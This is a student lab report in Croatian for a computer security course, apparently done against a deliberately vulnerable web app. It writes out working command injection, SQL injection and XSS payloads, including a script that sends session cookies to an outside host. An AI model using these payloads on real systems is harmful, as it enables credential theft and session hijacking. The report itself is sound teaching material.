                        +==============================+
                        | Sigurnost računalnih sustava |
                        | Treća laboratorijska vježba  |
                        +------------------------------+
                        |         Borna Cafuk          |
                        +==============================+


+------------------------------------------+
| 1) Izvođenje naredbi (Command Injection) |
+------------------------------------------+

U obrazac na stranici „Command Injection” sam upisao „1 | cat /etc/passwd”.
Time se u ljusci poslužitelja izvela naredba „ping 1 | cat /etc/passwd”, koja
je pokrenula naredbu „ping 1” i njezin izlaz preusmjerila kao ulaz u
„cat /etc/passwd”.  Ispis prve naredbe nije važan jer ga druga naredba
ignorira.  Ta druga naredba zatim ispisuje sadržaj datoteke /etc/passwd.
Ispisani sadržaj datoteke glasi:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false


+------------------------------------------+
| 2) Napadi SQL umetanjem (SQL injection)  |
+------------------------------------------+

U obrazac na stranici „SQL Injection” sam upisao
„' union select concat(first_name, last_name), password from users #”.

Time nisam dobio niti jedan rezultat iz prvog upita, a drugi upit mi je dao
popis imena korisnika i sažetaka njihovih lozinki.  Ime korisnika je u
rezultatu u prvom stupcu, pa se na stranici pojavilo pod „First name”, a
sažetak loninke je u drugom stupcu, pa je bio naveden kao „Surname”.  Zatim sam
našao korisnika pod imenom „PabloPicasso” i kopirao odgovarajući sažetak
lozinke: „0d107d09f5bbe40cade3de5c71e9e9b7”.

Konačno sam iz sažetka pomoću alata https://crackstation.net/ došao do
korisnikove loznike, koja je „letmein”.


+------------------------------------------+
| 3) XSS (Cross Site Scripting)            |
+------------------------------------------+

Otvorio sam stranicu „XSS (Stored)”.  U polje poruke sam upisao
„<script>alert(document.cookie)</script>”.  Time sam na ekranu dobio skočni
prozor sa svojim kolačićima. Među njima je i traženi:
PHPSESSID=82pfcbjf5ddrgujl9077suq614

Korištenjem alata „Inpect” u pregledniku sam elementu <textarea> uklonio
atribut „maxlength”, te sam si time omogućio slanje poruke dulje od 50
znakova.  Za slanje kolačića kao parametra u GET zahtjevu sam koristio skriptu:

<script>{
  const params = new URLSearchParams();
  params.set('cookie', document.cookie);
  fetch('http://public.tel.fer.hr/srs?' + params.toString(), {mode: 'no-cors'});
}</script>

Za napade na stranici „XSS (Reflected)” sam koristio istovjetne skripte:

http://192.168.56.101/vulnerabilities/xss_r/?name=<script>alert(document.cookie)<%2Fscript>

http://192.168.56.101/vulnerabilities/xss_r/?name=%3Cscript%3E%7B+const+params+%3D+new+URLSearchParams%28%29%3B+params.set%28%27cookie%27%2C+document.cookie%29%3B+fetch%28%27http%3A%2F%2Fpublic.tel.fer.hr%2Fsrs%3F%27+%2B+params.toString%28%29%2C+%7Bmode%3A+%27no-cors%27%7D%29%3B+%7D%3C%2Fscript%3E
